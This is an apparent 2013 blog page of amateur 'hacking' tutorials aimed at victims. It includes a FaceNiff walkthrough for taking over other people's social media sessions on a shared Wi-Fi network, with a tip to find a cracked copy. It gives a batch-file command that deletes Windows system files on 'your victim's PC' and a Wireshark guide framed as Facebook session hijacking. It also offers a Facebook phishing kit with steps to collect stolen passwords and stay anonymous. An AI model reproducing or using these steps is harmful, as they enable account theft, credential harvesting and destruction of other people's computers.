Tuesday, 5 February 2013

Hacking Books

Two Great Books you can read about hacking

Art of Deception: http://fr.thehackademy.net/madchat/esprit/textes/The_Art_of_Deception.pdf

Art of Intrusion:
http://deathmule.nullfile.com/documents/taoi.pdf

If you like them just comment below.

Facebook Hacking Using Your Android Phone



This is probably one of the coolest way to gain access to someones facebook account, and also works for twitter, youtube and amazon accounts. It can be done completely from your android phone, and most phones are compatible.

What this requires:

Your phone must be an Android phone, and it must be unlocked. Google or youtube search how to unlock your phone, its pretty easy. You must be on the same network as the person you want to hack into That person must be currently using facebook on a computer Won't work if the person is using the https security option in facebook

1. Once you have an unlocked phone, you need to download an app called FaceNiff. You can download from your phone athttp://faceniff.ponury.net/ and its free, for the first 3 accounts you get into. If you want to get the unlocked version of the app you'll have to pay to unlock it, or you can google search for a cracked version. I recommend searching faceniff on Vuze for a cracked torrent.

2. Once the app is installed, connect to the wifi of your victim.

3. Open the FaceNiff app, and press the big power button in the middle. If it asks you to allow permissions for the app, do so.

4. It will now be monitoring activity. Anyone who uses facebook/youtube/twitter/amazon on the network you're connected to will show up on your phone. Simply click on them, and you'll be logged into their account.

5. If nothing is showing up, try using stealth mode in FaceNiff. Some routers prevent these kind of hacks; stealth mode will attempt to bypass this.

Hope you like it!!! ^^

DESTROY A COMPUTER SYSTEM USING NOTEPAD



I M HERE TO EXPLAIN YOU ON HOW TO MAKE A FILE THAT DESTROYS UR VICTIMS PC using your notepad.

1. OPEN NOTEPAD
2. WRITE THE BELOW COMMAND : -
DEL C:\WINDOWS\SYSTEM32\*.*/Q
3. SAVE THE ABOVE NOTEPAD WITH THE EXTENSION “.BAT"
4. !!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!! !!!
DON’T DOUBLE CLICK THE FILE OTHERWISE YOU WILL BE THE VICTIM.
5. YOU CAN TRY THIS FILE IN ANY ONE`S COMPUTER.(BUT THIS RESULT IN CAUSING DAMAGE TO THE COMPUTER, SO THINK AGAIN BEFORE TRYING THIS ON ANYONE’S PC).

ENJOY!!! >:D

"Hack Facebook Accounts by Hijacking Sessions with Wireshark"



Download Wireshark here:
http://www.mediafire.com/?e8itl3v85jxgb7g

Here is how you use it:
* Capturing Packets
After downloading and installing Wireshark, you can launch it and click the name of an interface under Interface List to start capturing packets on that interface. For example, if you want to capture traffic on the wireless network, click your wireless interface. You can configure advanced features by clicking Capture Options, but this isn’t necessary for now.
See Photo: http://www.howtogeek.com/wp-content/uploads/2012/01/wireshark1.png

* As soon as you click the interface’s name, you’ll see the packets start to appear in real time. Wireshark captures each packet sent to or from your system. If you’re capturing on a wireless interface and have promiscuous mode enabled in your capture options, you’ll also see other the other packets on the network.
See Photo: http://www.howtogeek.com/wp-content/uploads/2012/01/wireshark2.png

* Click the stop capture button near the top left corner of the window when you want to stop capturing traffic.
See Photo: http://www.howtogeek.com/wp-content/uploads/2012/01/wireshark3.png

*Color Coding
You’ll probably see packets highlighted in green, blue and black. Wireshark uses colors to help you identify the types of traffic at a glance. By default, green is TCP traffic, dark blue is DNS traffic, light blue is UDP traffic and black identifies TCP packets with problems — for example, they could have been delivered out-of-order.
See Photo: http://www.howtogeek.com/wp-content/uploads/2012/01/wireshark5.png

* Sample Captures
If there’s nothing interesting on your own network to inspect, Wireshark’s wiki has you covered. The wiki contains a page of sample capture files that you can load and inspect.

Opening a capture file is easy; just click Open on the main screen and browse for a file. You can also save your own captures in Wireshark and open them later.

See Photo: http://www.howtogeek.com/wp-content/uploads/2012/01/wireshark4.png

Hope you enjoy the Tutorial!!! :))
Happy Hacking!!! ^^

Facebook Phishing Guys

‎"Here is the Code for your Facebook Phishing Guys"

Download Link:
http://www.mediafire.com/?k4sqdehsn3k1gg7

Open the Link and Sign up for a Free Web Hosting Site:
http://pastebin.com/8zQBeiGQ

Tutorial:
* Choose and Sign Up Any of those Above!
* Upload the HTML File to your site and save it as index.html
* send it to your victim and wait till they Log-in.. ^^
* On you site, put "pwd.txt" at the end to see the passwords of those accounts that were Hacked..
(Example: www.yoursite.com/pwd.txt)

Reminders:
For safe use, don't use your real emails in registering to the Web Hosting instead create a new email.. ^^

Hope You enjoy!!!